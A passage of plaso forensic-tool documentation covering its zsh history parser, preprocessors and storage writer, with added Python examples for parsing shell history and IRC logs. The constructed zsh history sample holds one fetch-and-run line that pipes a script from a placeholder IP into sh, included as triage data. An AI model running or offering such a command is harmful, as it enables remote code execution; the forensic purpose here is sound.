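def parse_scrollback_line(line: str) -> Optional[Dict[str, object]]:
    """Return {'timestamp', 'nickname', 'text'} or None if not a scrollback line."""
    match = LINE_RE.match(line.rstrip("\r\n"))
    if not match:
        return None
    text = strip_decorators(match.group("text"))
    nick_match = NICK_RE.match(text)
    nickname: Optional[str] = None
    if nick_match:
        nickname, text = nick_match.group("nick"), nick_match.group("text")
    # time(0) in the source: seconds since the Unix epoch, UTC.
    timestamp = datetime.fromtimestamp(int(match.group("ts")), tz=timezone.utc)
    return {"timestamp": timestamp, "nickname": nickname, "text": text}


def parse_scrollback(text: str) -> List[Dict[str, object]]:
    """Parse every line, silently skipping lines that are not scrollback entries."""
    events = []
    for line in text.splitlines():
        event = parse_scrollback_line(line)
        if event is not None:
            events.append(event)
    return events


if __name__ == "__main__":
    for event in parse_scrollback(SAMPLE_SCROLLBACK):
        print(event["timestamp"].isoformat(), event["nickname"] or "-", event["text"])
```

Stripping before matching the nickname matters: a coloured nick such as '\x034<fpi>\x03' would otherwise fail the '<nick>' match and be stored as plain text with the control bytes still in it, which then breaks grep-style searches over the timeline.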
plaso.parsers.zsh_extended_history module
Parser for ZSH extended_history files.
The file format is described here: http://zsh.sourceforge.net/Doc/Release/Options.html#index-EXTENDEDHISTORY
class plaso.parsers.zsh_extended_history.ZshExtendedHistoryParser
Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
Parser for ZSH extended history files.
DATA_FORMAT = 'ZSH extended history file'
LINE_STRUCTURES = [('command', {{{{{{":" W:(0123...)} ":"} W:(0123...)} ";"} Re:('.+?(?=($|\\n:\\s\\d+:\\d+;))')} LineEnd})]
NAME = 'zsh_extended_history'
ParseRecord(parser_mediator, key, structure)
Parses a record and produces a ZSH history event.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure parsed from the log file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, lines)
Verifies whether the content corresponds to a ZSH extended_history file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if the line was successfully parsed.
Return type bool
class plaso.parsers.zsh_extended_history.ZshHistoryEventData
Bases: plaso.containers.events.EventData
ZSH history event data.
command: command that was run.
Type str
elapsed_seconds: number of seconds that the command took to execute.
Type int
DATA_TYPE = 'shell:zsh:history'
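The interesting part of the grammar above is the regular expression ".+?(?=($|\n:\s\d+:\d+;))": a command runs until the next line that starts a new ": <start>:<elapsed>;" record, which is how multi-line commands survive. The example below, added for this page and not plaso's ZshExtendedHistoryParser, applies the same lookahead with re.MULTILINE and re.DOTALL, converts the start time (Unix epoch) to UTC, derives the end time from elapsed seconds, and adds a hypothetical triage helper for searching commands. The history content is constructed.

```python
"""Parse zsh EXTENDED_HISTORY entries, including multi-line commands.

Added example for this page; not plaso's own parser.
"""
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Constructed sample. A backslash before the newline is how zsh stores a
# command that continued onto the next line.
SAMPLE_HISTORY = (
    ": 1602075600:0;ls -la /var/log\n"
    ": 1602075605:12;for f in /var/log/*.log; do\\\n"
    "  gzip -k \"$f\"\\\n"
    "done\n"
    ": 1602075700:3;curl -s http://203.0.113.9/x.sh | sh\n"
)

# Same idea as the page's grammar: the command is everything up to the next
# record header or the end of the file.
ENTRY_RE = re.compile(
    r"^: (?P<start>\d+):(?P<elapsed>\d+);(?P<command>.*?)(?=\n: \d+:\d+;|\Z)",
    re.MULTILINE | re.DOTALL)


def looks_like_extended_history(text: str) -> bool:
    """VerifyStructure-style check: the file must open with a record header."""
    return re.match(r": \d+:\d+;", text) is not None


def parse_extended_history(text: str) -> List[Dict[str, object]]:
    """Return one dict per record: start, end, elapsed_seconds, command."""
    if not looks_like_extended_history(text):
        raise ValueError("not a zsh extended_history file")
    entries: List[Dict[str, object]] = []
    for match in ENTRY_RE.finditer(text):
        start = datetime.fromtimestamp(int(match.group("start")), tz=timezone.utc)
        elapsed = int(match.group("elapsed"))
        entries.append({
            "start": start,
            "end": start + timedelta(seconds=elapsed),
            "elapsed_seconds": elapsed,
            # Only the final record carries a trailing newline (matched via \Z).
            "command": match.group("command").rstrip("\n"),
        })
    return entries


def commands_matching(entries: List[Dict[str, object]], pattern: str):
    """Hypothetical triage helper: records whose command matches a regex."""
    regex = re.compile(pattern)
    return [e for e in entries if regex.search(str(e["command"]))]


if __name__ == "__main__":
    for entry in parse_extended_history(SAMPLE_HISTORY):
        print(entry["start"].isoformat(), entry["elapsed_seconds"], "s",
              entry["command"].splitlines()[0])
```

Keep in mind when timelining shell history that the start time is when the command was entered and elapsed_seconds is how long it ran; a long-running command (a reverse shell, a download) therefore spans an interval, which is why the example computes an end time as well.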
Module contents
This file imports Python modules that register parsers.
5.1.12 plaso.preprocessors package
Submodules
plaso.preprocessors.interface module
This file contains classes used for preprocessing in plaso.
class plaso.preprocessors.interface.ArtifactPreprocessorPlugin
Bases: object
The artifact preprocessor plugin interface.
The artifact preprocessor determines preprocessing attributes based on an artifact definition defined by ARTIFACT_DEFINITION_NAME.
ARTIFACT_DEFINITION_NAME = None
class plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
File artifact preprocessor plugin interface.
Shared functionality for preprocessing attributes based on a file artifact definition, such as file or path.
class plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
Bases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin
File entry artifact preprocessor plugin interface.
Shared functionality for preprocessing attributes based on a file entry artifact definition, such as file or path.
class plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin
Bases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin
File system artifact preprocessor plugin interface.
Shared functionality for preprocessing attributes based on a file system artifact definition, such as file or path.
Collect(knowledge_base, artifact_definition, searcher, file_system)
Collects values using a file system artifact definition.
Parameters
• knowledge_base (KnowledgeBase) – to fill with preprocessing information.
• artifact_definition (artifacts.ArtifactDefinition) – artifact definition.
• searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess the file system.
• file_system (dfvfs.FileSystem) – file system to be preprocessed.
Raises PreProcessFail – if the preprocessing fails.
class plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin
Bases: object
The knowledge base preprocessor plugin interface.
The knowledge base preprocessor determines preprocessing attributes based on other values in the knowledge base.
abstract Collect(knowledge_base)
Collects values from the knowledge base.
Parameters knowledge_base (KnowledgeBase) – to fill with preprocessing information.
Raises PreProcessFail – if the preprocessing fails.
class plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin
Bases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin
Windows Registry key artifact preprocessor plugin interface.
Shared functionality for preprocessing attributes based on a Windows Registry artifact definition, such as a Windows Registry key or value.
Collect(knowledge_base, artifact_definition, searcher)
Collects values using a Windows Registry key or value artifact definition.
Parameters
• knowledge_base (KnowledgeBase) – to fill with preprocessing information.
• artifact_definition (artifacts.ArtifactDefinition) – artifact definition.
• searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher to preprocess the Windows Registry.
Raises PreProcessFail – if the Windows Registry key or value cannot be read.
class plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin
Windows Registry value artifact preprocessor plugin interface.
Shared functionality for preprocessing attributes based on a Windows Registry value artifact definition.
plaso.preprocessors.linux module
This file contains preprocessors for Linux.
class plaso.preprocessors.linux.LinuxDistributionPlugin
Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
The Linux distribution plugin.
ARTIFACT_DEFINITION_NAME = 'LinuxDistributionRelease'
class plaso.preprocessors.linux.LinuxHostnamePlugin
Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
The Linux hostname plugin.
ARTIFACT_DEFINITION_NAME = 'LinuxHostnameFile'
class plaso.preprocessors.linux.LinuxIssueFilePlugin
Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
The Linux issue file plugin.
ARTIFACT_DEFINITION_NAME = 'LinuxIssueFile'
class plaso.preprocessors.linux.LinuxStandardBaseReleasePlugin
Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
The Linux standard base (LSB) release plugin.
ARTIFACT_DEFINITION_NAME = 'LinuxLSBRelease'
class plaso.preprocessors.linux.LinuxSystemdOperatingSystemPlugin
Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
The Linux systemd operating system release plugin.
ARTIFACT_DEFINITION_NAME = 'LinuxSystemdOSRelease'
class plaso.preprocessors.linux.LinuxTimeZonePlugin
Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
Linux time zone plugin.
ARTIFACT_DEFINITION_NAME = 'LinuxLocalTime'
class plaso.preprocessors.linux.LinuxUserAccountsPlugin
Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
The Linux user accounts plugin.
ARTIFACT_DEFINITION_NAME = 'LinuxPasswdFile'
plaso.preprocessors.logger module
The preprocessors sub module logger.
plaso.preprocessors.macos module
This file contains preprocessors for MacOS.
class plaso.preprocessors.macos.MacOSHostnamePlugin
Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
MacOS hostname plugin.
ARTIFACT_DEFINITION_NAME = 'MacOSSystemConfigurationPreferencesPlistFile'
class plaso.preprocessors.macos.MacOSKeyboardLayoutPlugin
Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
MacOS keyboard layout plugin.
ARTIFACT_DEFINITION_NAME = 'MacOSKeyboardLayoutPlistFile'
class plaso.preprocessors.macos.MacOSSystemVersionPlugin
Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
MacOS system version information plugin.
ARTIFACT_DEFINITION_NAME = 'MacOSSystemVersionPlistFile'
class plaso.preprocessors.macos.MacOSTimeZonePlugin
Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
MacOS time zone plugin.
ARTIFACT_DEFINITION_NAME = 'MacOSLocalTime'
class plaso.preprocessors.macos.MacOSUserAccountsPlugin
Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin
MacOS user accounts plugin.
ARTIFACT_DEFINITION_NAME = 'MacOSUserPasswordHashesPlistFiles'
class plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin
Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin
Plist file artifact preprocessor plugin interface.
Retrieves values from a plist file artifact using the names of keys defined in _PLIST_KEYS.
plaso.preprocessors.manager module
The preprocess plugins manager.
class plaso.preprocessors.manager.PreprocessPluginsManager
Bases: object
Preprocess plugins manager.
classmethod CollectFromFileSystem(artifacts_registry, knowledge_base, searcher, file_system)
Collects values from the file system using the registered file system artifact plugins.
Parameters
• artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry.
• knowledge_base (KnowledgeBase) – to fill with preprocessing information.
• searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess the file system.
• file_system (dfvfs.FileSystem) – file system to be preprocessed.
classmethod CollectFromKnowledgeBase(knowledge_base)
Collects values from knowledge base values.
Parameters knowledge_base (KnowledgeBase) – to fill with preprocessing information.
classmethod CollectFromWindowsRegistry(artifacts_registry, knowledge_base, searcher)
Collects values from Windows Registry values.
Parameters
• artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry.
• knowledge_base (KnowledgeBase) – to fill with preprocessing information.
• searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher to preprocess the Windows Registry.
classmethod DeregisterPlugin(plugin_class)
Deregisters a preprocess plugin class.
Parameters plugin_class (type) – preprocess plugin class.
Raises
• KeyError – if the plugin class is not set for the corresponding name.
• TypeError – if the source type of the plugin class is not supported.
classmethod GetNames()
Retrieves the names of the registered artifact definitions.
Returns registered artifact definition names.
Return type list[str]
classmethod RegisterPlugin(plugin_class)
Registers a preprocess plugin class.
Parameters plugin_class (type) – preprocess plugin class.
Raises
• KeyError – if the plugin class is already set for the corresponding name.
• TypeError – if the source type of the plugin class is not supported.
classmethod RegisterPlugins(plugin_classes)
Registers preprocess plugin classes.
Parameters plugin_classes (list[type]) – preprocess plugin classes.
Raises KeyError – if a plugin class is already set for the corresponding name.
classmethod RunPlugins(artifacts_registry, file_system, mount_point, knowledge_base)
Runs the preprocessing plugins.
Parameters
• artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry.
• file_system (dfvfs.FileSystem) – file system to be preprocessed.
• mount_point (dfvfs.PathSpec) – mount point path specification that refers to the base location of the file system.
• knowledge_base (KnowledgeBase) – to fill with preprocessing information.
plaso.preprocessors.windows module
This file contains preprocessors for Windows.
class plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePlugin
Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin
The allusersdata knowledge base value plugin.
The allusersdata value is needed for the expansion of %%environ_allusersappdata%% in artifact definitions.
Collect(knowledge_base)
Collects values from the knowledge base.
Parameters knowledge_base (KnowledgeBase) – to fill with preprocessing information.
Raises PreProcessFail – if the preprocessing fails.
class plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePlugin
Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin
The allusersprofile knowledge base value plugin.
The allusersprofile value is needed for the expansion of %%environ_allusersappprofile%% in artifact definitions.
It is derived from %ProgramData% on versions of Windows (Vista and later) that do not define %AllUsersProfile%.
Collect(knowledge_base)
Collects values from the knowledge base.
Parameters knowledge_base (KnowledgeBase) – to fill with preprocessing information.
Raises PreProcessFail – if the preprocessing fails.
class plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePlugin
Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
The Windows %AllUsersProfile% environment variable plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableAllUsersProfile'
class plaso.preprocessors.windows.WindowsAvailableTimeZonesPlugin
Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin
The Windows available time zones plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsAvailableTimeZones'
class plaso.preprocessors.windows.WindowsCodepagePlugin
Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
The Windows codepage plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsCodePage'
442 Chapter 5. plaso package
Plaso (log2timeline), Release 20201007
class plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
Windows environment variable artifact preprocessor plugin interface.
class plaso.preprocessors.windows.WindowsHostnamePluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
The Windows hostname plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsComputerName'
class plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPluginBases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin
Windows path environment variable plugin interface.
class plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
The Windows %ProgramData% environment variable plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramData'
class plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePluginBases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin
The programdata knowledge base value plugin.
The programdata value is needed for the expansion of %%environ_programdata%% in artifact definitions.
It is derived from %AllUsersProfile% for versions of Windows prior to Vista that do not define %ProgramData%.
Collect(knowledge_base)Collects values from the knowledge base.
Parameters knowledge_base (KnowledgeBase) – to fill with preprocessing information.
Raises PreProcessFail – if the preprocessing fails.
class plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
The Windows %ProgramFiles% environment variable plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFiles'
class plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
The Windows %ProgramFilesX86% environment variable plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFilesX86'
class plaso.preprocessors.windows.WindowsSystemProductPluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
The Windows system product information plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsProductName'
class plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin
The Windows %SystemRoot% environment variable plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableSystemRoot'
5.1. Subpackages 443
Plaso (log2timeline), Release 20201007
class plaso.preprocessors.windows.WindowsSystemVersionPluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
The Windows system version information plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsCurrentVersion'
class plaso.preprocessors.windows.WindowsTimeZonePluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
The Windows time zone plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsTimezone'
class plaso.preprocessors.windows.WindowsUserAccountsPluginBases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin
The Windows user account plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsRegistryProfiles'
class plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin
The Windows %WinDir% environment variable plugin.
ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableWinDir'
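The two knowledge base plugins above derive one of %ProgramData% and %AllUsersProfile% from the other, so that artifact definitions using %%environ_programdata%% or %%environ_allusersprofile%% still expand on systems that only record one of the two. The following is an added example and is not plaso's code: it uses a constructed stand-in for the knowledge base (the GetEnvironmentVariable and SetEnvironmentVariable method names, the PreProcessFail class and the ExpandArtifactPath helper are assumptions made for this illustration, not plaso's API) to show the fallback in both directions, the PreProcessFail case when neither variable is defined, and the expansion of a %%environ_...%% token in an artifact path.

```python
import re

# Constructed stand-ins for this example. plaso's KnowledgeBase and
# PreProcessFail live elsewhere and have a different API.


class PreProcessFail(Exception):
    """Raised when a value the preprocessing needs cannot be collected."""


class KnowledgeBase:
    """Stores environment variables by case-insensitive name."""

    def __init__(self):
        self._variables = {}

    def GetEnvironmentVariable(self, name):
        return self._variables.get(name.upper())

    def SetEnvironmentVariable(self, name, value):
        self._variables[name.upper()] = value


def CollectProgramData(knowledge_base):
    """Ensures ProgramData is known, deriving it from AllUsersProfile on
    systems prior to Vista that only define the latter."""
    value = knowledge_base.GetEnvironmentVariable('ProgramData')
    if value is None:
        value = knowledge_base.GetEnvironmentVariable('AllUsersProfile')
        if value is None:
            raise PreProcessFail(
                'neither %ProgramData% nor %AllUsersProfile% is defined')
        knowledge_base.SetEnvironmentVariable('ProgramData', value)
    return value


def CollectAllUsersProfile(knowledge_base):
    """Ensures AllUsersProfile is known, deriving it from ProgramData on
    Vista and later systems that do not define AllUsersProfile."""
    value = knowledge_base.GetEnvironmentVariable('AllUsersProfile')
    if value is None:
        value = knowledge_base.GetEnvironmentVariable('ProgramData')
        if value is None:
            raise PreProcessFail(
                'neither %AllUsersProfile% nor %ProgramData% is defined')
        knowledge_base.SetEnvironmentVariable('AllUsersProfile', value)
    return value


# Token syntax used by Forensic Artifacts definitions, e.g. %%environ_windir%%.
_ENVIRON_TOKEN = re.compile(r'%%environ_([a-z0-9_]+)%%', re.IGNORECASE)


def ExpandArtifactPath(path, knowledge_base):
    """Replaces every %%environ_<name>%% token with the knowledge base value,
    failing loudly instead of leaving an unexpanded token in the path."""
    def _Replace(match):
        value = knowledge_base.GetEnvironmentVariable(match.group(1))
        if value is None:
            raise PreProcessFail(
                'unknown environment variable: {0:s}'.format(match.group(0)))
        return value

    return _ENVIRON_TOKEN.sub(_Replace, path)


if __name__ == '__main__':
    # Constructed sample: a Vista-or-later system whose registry only
    # provides %ProgramData%.
    kb = KnowledgeBase()
    kb.SetEnvironmentVariable('ProgramData', 'C:\\ProgramData')
    CollectAllUsersProfile(kb)
    print(ExpandArtifactPath(
        '%%environ_allusersprofile%%\\Microsoft\\Windows\\Start Menu', kb))
```

Raising PreProcessFail rather than returning the path with the token still in it matters in practice: a collection filter built from an unexpanded path matches nothing, and the resulting timeline silently lacks the whole ProgramData tree. A failure that surfaces as a preprocessing error is visible; a quietly empty filter is not.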
Module contents
Preprocessor.
5.1.13 plaso.serializer package
Submodules
plaso.serializer.interface module
The serializer object interfaces.
class plaso.serializer.interface.AttributeContainerSerializer
Bases: object
Class that implements the attribute container serializer interface.
abstract ReadSerialized(serialized)
Reads an attribute container from serialized form.
Parameters serialized (object) – serialized form.
Returns attribute container.
Return type AttributeContainer
abstract WriteSerialized(attribute_container)
Writes an attribute container to serialized form.
Parameters attribute_container (AttributeContainer) – attribute container.
Returns serialized form.
Return type object
plaso.serializer.json_serializer module
The JSON serializer object implementation.
class plaso.serializer.json_serializer.JSONAttributeContainerSerializer
Bases: plaso.serializer.interface.AttributeContainerSerializer
JSON attribute container serializer.
classmethod ReadSerialized(json_string)
Reads an attribute container from serialized form.
Parameters json_string (str) – JSON serialized attribute container.
Returns attribute container or None.
Return type AttributeContainer
classmethod ReadSerializedDict(json_dict)
Reads an attribute container from serialized dictionary form.
Parameters json_dict (dict[str, object]) – JSON serialized objects.
Returns attribute container or None.
Return type AttributeContainer
Raises TypeError – if the serialized dictionary does not contain an AttributeContainer.
classmethod WriteSerialized(attribute_container)
Writes an attribute container to serialized form.
Parameters attribute_container (AttributeContainer) – attribute container.
Returns A JSON string containing the serialized form.
Return type str
classmethod WriteSerializedDict(attribute_container)
Writes an attribute container to serialized form.
Parameters attribute_container (AttributeContainer) – attribute container.
Returns JSON serialized objects.
Return type dict[str, object]
plaso.serializer.logger module
The serializer sub module logger.
Module contents
5.1.14 plaso.storage package
Subpackages
plaso.storage.fake package
Submodules
plaso.storage.fake.writer module
Fake storage writer for testing.
class plaso.storage.fake.writer.FakeStorageWriter(session, storage_type='session', task=None)
Bases: plaso.storage.interface.StorageWriter
Fake storage writer object.
analysis_reports
analysis reports.
Type list[AnalysisReport]
session_completion
session completion attribute container.
Type SessionCompletion
session_configuration
session configuration attribute container.
Type SessionConfiguration
session_start
session start attribute container.
Type SessionStart
task_completion
task completion attribute container.
Type TaskCompletion
task_start
task start attribute container.
Type TaskStart
AddAnalysisReport(analysis_report, serialized_data=None)
Adds an analysis report.
Parameters
• analysis_report (AnalysisReport) – analysis report.
• serialized_data (Optional[bytes]) – serialized form of the analysis report.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEvent(event, serialized_data=None)
Adds an event.
Parameters
• event (EventObject) – event.
• serialized_data (Optional[bytes]) – serialized form of the event.
Raises
• IOError – when the storage writer is closed or if the event data identifier type is not supported.
• OSError – when the storage writer is closed or if the event data identifier type is not supported.
AddEventData(event_data, serialized_data=None)
Adds event data.
Parameters
• event_data (EventData) – event data.
• serialized_data (Optional[bytes]) – serialized form of the event data.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEventDataStream(event_data_stream, serialized_data=None)
Adds an event data stream.
Parameters
• event_data_stream (EventDataStream) – event data stream.
• serialized_data (Optional[bytes]) – serialized form of the event data stream.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEventSource(event_source, serialized_data=None)
Adds an event source.
Parameters
• event_source (EventSource) – event source.
• serialized_data (Optional[bytes]) – serialized form of the event source.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddEventTag(event_tag, serialized_data=None)
Adds an event tag.
Parameters
• event_tag (EventTag) – event tag.
• serialized_data (Optional[bytes]) – serialized form of the event tag.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
AddWarning(warning, serialized_data=None)
Adds a warning.
Parameters
• warning (ExtractionWarning) – warning.
• serialized_data (Optional[bytes]) – serialized form of the warning.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
CheckTaskReadyForMerge(task)
Checks if a task is ready for merging into the session store.
Parameters task (Task) – task.
Returns True if the task is ready to be merged.
Return type bool
Raises
• IOError – if the task storage type is not supported or the storage writer for the task does not exist.
• OSError – if the task storage type is not supported or the storage writer for the task does not exist.
Close()
Closes the storage writer.
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
CreateTaskStorage(task, task_storage_format)
Creates a task storage.
Parameters
• task (Task) – task.
• task_storage_format (str) – storage format to store task results.
Returns storage writer.
Return type FakeStorageWriter
Raises
• IOError – if the task storage already exists.
• OSError – if the task storage already exists.
FinalizeTaskStorage(task)
Finalizes a processed task storage.
Parameters task (Task) – task.
Raises
• IOError – if the task storage does not exist.
• OSError – if the task storage does not exist.
GetEventData()
Retrieves the event data.
Returns event data generator.
Return type generator(EventData)
GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
GetEventSources()
Retrieves the event sources.
Returns event source generator.
Return type generator(EventSource)
GetEventTags()
Retrieves the event tags.
Returns event tag generator.
Return type generator(EventTag)
GetEvents()
Retrieves the events.
Returns event generator.
Return type generator(EventObject)
GetFirstWrittenEventSource()
Retrieves the first event source that was written after open.
Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
Returns event source or None if there are no newly written ones.
Return type EventSource
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
GetNextWrittenEventSource()
Retrieves the next event source that was written after open.
Returns event source or None if there are no newly written ones.
Return type EventSource
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Returns event generator.
Return type generator(EventObject)
Raises
• IOError – when the storage writer is closed.
• OSError – when the storage writer is closed.
GetWarnings()
Retrieves the warnings.
Returns warning generator.
Return type generator(ExtractionWarning)
Open(**unused_kwargs)
Opens the storage writer.
Raises
• IOError – if the storage writer is already opened.
• OSError – if the storage writer is already opened.
PrepareMergeTaskStorage(task)
Prepares a task storage for merging.
Parameters task (Task) – task.
Raises
• IOError – if the task storage does not exist.
• OSError – if the task storage does not exist.
RemoveProcessedTaskStorage(task)
Removes a processed task storage.
Parameters task (Task) – task.
Raises
• IOError – if the task storage does not exist.
• OSError – if the task storage does not exist.
SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
WriteSessionCompletion(aborted=False)
Writes session completion information.
Parameters aborted (Optional[bool]) – True if the session was aborted.
Raises
• IOError – if the storage type does not support writing a session completion or when the storage writer is closed.
• OSError – if the storage type does not support writing a session completion or when the storage writer is closed.
WriteSessionConfiguration()
Writes session configuration information.
Raises
• IOError – if the storage type does not support writing session configuration information or when the storage writer is closed.
• OSError – if the storage type does not support writing session configuration information or when the storage writer is closed.
WriteSessionStart()
Writes session start information.
Raises
• IOError – if the storage type does not support writing a session start or when the storage writer is closed.
• OSError – if the storage type does not support writing a session start or when the storage writer is closed.
WriteTaskCompletion(aborted=False)
Writes task completion information.
Parameters aborted (Optional[bool]) – True if the task was aborted.
Raises
• IOError – if the storage type does not support writing a task completion or when the storage writer is closed.
• OSError – if the storage type does not support writing a task completion or when the storage writer is closed.
WriteTaskStart()
Writes task start information.
Raises
• IOError – if the storage type does not support writing a task start or when the storage writer is closed.
• OSError – if the storage type does not support writing a task start or when the storage writer is closed.
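FakeStorageWriter above is the in-memory reference implementation of the StorageWriter contract: every Add and Get call is rejected with IOError once the writer is closed, GetFirstWrittenEventSource and GetNextWrittenEventSource act as a cursor over the event sources added since Open, and GetSortedEvents can be restricted to a TimeRange. The following is an added example and is not plaso's code; InMemoryStorageWriter, TimeRange and the two container classes are constructed for this illustration and cover only those three behaviours.

```python
import bisect


class TimeRange:
    """Inclusive [start_timestamp, end_timestamp] window, in microseconds."""

    def __init__(self, start_timestamp, end_timestamp):
        if start_timestamp > end_timestamp:
            raise ValueError('start timestamp is after end timestamp')
        self.start_timestamp = start_timestamp
        self.end_timestamp = end_timestamp


class EventObject:
    def __init__(self, timestamp, timestamp_desc):
        self.timestamp = timestamp
        self.timestamp_desc = timestamp_desc


class EventSource:
    def __init__(self, path_spec):
        self.path_spec = path_spec


class InMemoryStorageWriter:
    """Constructed stand-in for a StorageWriter (not plaso's FakeStorageWriter)."""

    def __init__(self):
        self._is_open = False
        self._events = []            # EventObject, kept in timestamp order
        self._timestamps = []        # parallel list of timestamps for bisect
        self._event_sources = []
        self._first_written_index = 0  # first source added after the last Open
        self._cursor = 0               # position for GetNextWrittenEventSource

    def _RaiseIfClosed(self):
        if not self._is_open:
            raise IOError('storage writer is closed')

    def Open(self):
        if self._is_open:
            raise IOError('storage writer is already opened')
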